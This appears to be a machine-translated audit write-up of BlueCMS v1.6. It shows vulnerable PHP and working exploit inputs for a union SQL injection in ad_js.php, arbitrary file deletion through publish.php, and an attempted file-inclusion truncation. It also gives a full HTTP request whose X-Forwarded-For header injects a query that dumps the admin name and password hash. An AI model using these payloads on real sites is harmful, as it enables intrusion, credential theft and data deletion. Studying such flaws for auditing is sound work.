Bluecmsv1.6 code audit

This time is for a simple cms Conduct a code audit as a starter , Direct use seay Perform automated audits

sql Injection vulnerability in file uploads/ad_js.php
Through here get Method acceptance ad_id Variables have no filters spliced into sql Statement and execute

define('IN_BLUE', true);
require_once dirname(__FILE__) . '/include/common.inc.php';

$ad_id = !empty($_GET['ad_id']) ? trim($_GET['ad_id']) : '';
if(empty($ad_id))
{
    
	echo 'Error!';
	exit();
}

$ad = $db->getone("SELECT * FROM ".table('ad')." WHERE ad_id =".$ad_id);

Follow me getone Function directly executes the statement

 function getall($sql, $type=MYSQL_ASSOC){
    
    	$query = $this->query($sql);
    	while($row = mysql_fetch_array($query,$type)){
    
    		$rows[] = $row;
    	}
    	return $rows;
    }

Verify vulnerability direct access uploads/ad_js.php?id=1’ A single quotation mark here indicates an error, indicating that there is an injection attempt to guess the number of fields
uploads/ad_js.php?ad_id=1%20order%20by%207%20–+
order by 7 It's normal to 8 Direct error reporting indicates that 7 A field
union select 1,2,3,4,5,6,7 --+
7 Is an explicit field , Here, if you look at the web page alone, there is no content. You must click to see the source code of the web page
union select 1,2,3,4,5,6,user() --+
View the current user

Any file deleted in uploads/publish.php

elseif($act == 'del_pic')
{
    
 	$id = $_REQUEST['id'];
 	
 	$db->query("DELETE FROM ".table('post_pic').
 				" WHERE pic_path='$id'");
 				
 				
 				
 	if(file_exists(BLUE_ROOT.$id))
 	{
    
 	
 		@unlink(BLUE_ROOT.$id);
 	}
}
 

adopt request Method acceptance id File name and determine whether the file exists in the delete , Directly in uploads Create under directory
1.php, Direct access uploads/publish.php?act=del_pic&id=1.php

Any file contains

elseif ($act == 'pay'){
    
 	include 'data/pay.cache.php';
 	$price = $_POST['price'];
 	$id = $_POST['id'];
 	$name = $_POST['name'];
 	if (empty($_POST['pay'])) {
    
 		showmsg('�Բ�����û��ѡ��֧����ʽ');
 	}
 	include 'include/payment/'.$_POST['pay']."/index.php";
 }

There will be post Over here pay Include but limit directories and files , You need to do this through truncation
adopt %00 Truncation failed

Truncate with the length of the lower path

① Conditions ：windows OS, The dot needs to be longer than 256;linux OS Longer than 4096
Windows The maximum length of the following directory is 256 byte , The excess will be discarded
Linux The maximum length of the following directory is 4096 byte , The excess will be discarded
use . Number to fill
I don't know why they didn't succeed

Insert injection in the comment area ip The header information is inserted into the database without filtering , We can fake ip The header inserts multiple statements at once to explode the administrator's password
include/comment.php

f($act == 'send')

{
    
	if(empty($id))
	{
    
 		return false;
 	}

 	$user_id = $_SESSION['user_id'] ? $_SESSION['user_id'] : 0;
 	$mood = intval($_POST['mood']);
 	$content = !empty($_POST['comment']) ? htmlspecialchars($_POST['comment']) : '';
 	$content = nl2br($content);
 	$type = intval($_POST['type']);
 	if(empty($content))
 	{
    
 		showmsg('�������ݲ���Ϊ��');
 	}
 	if($_CFG['comment_is_check'] == 0)
 	{
    
 		$is_check = 1;
 	}
 	else
 	{
    
 		$is_check = 0;
 	}

 	$sql = "INSERT INTO ".table('comment')." (com_id, post_id, user_id, type, mood, content, pub_date, ip, is_check) VALUES ('', '$id', '$user_id', '$type', '$mood', '$content', '$timestamp', '".getip()."', '$is_check')";

 	$db->query($sql);
 	if($type == 1)
 	{
    
 		$db->query("UPDATE ".table('article')." SET comment = comment+1 WHERE id = ".$id);
 	}
 	elseif($type == 0)
 	{
    
 		$db->query("UPDATE ".table('post')." SET comment = comment+1 WHERE post_id = ".$id);
 	}

visit /uploads/comment.php?id=1
Write a comment and then bp Packet capture increases X-Forwarded-Fo Field of

POST /uploads/comment.php?act=send HTTP/1.1
Host: www.blue1.com:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
X-Forwarded-For: 127.0.0.1','1'),('5', '1', '3', '0', '6', (select concat(admin_name,0x3e,pwd) from blue_admin), '1656396250', '127.0.0.1', '1')##
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 66
Origin: http://www.blue1.com:8080
Connection: close
Referer: http://www.blue1.com:8080/uploads/comment.php?id=1&type=0
Cookie: detail=5; PHPSESSID=83e76a6a5b87ec8abf5aa6639a8571e9
Upgrade-Insecure-Requests: 1

mood=6&comment=ccccccc&id=1&type=0&submit=%CC%E1%BD%BB%C6%C0%C2%DB

Successfully output data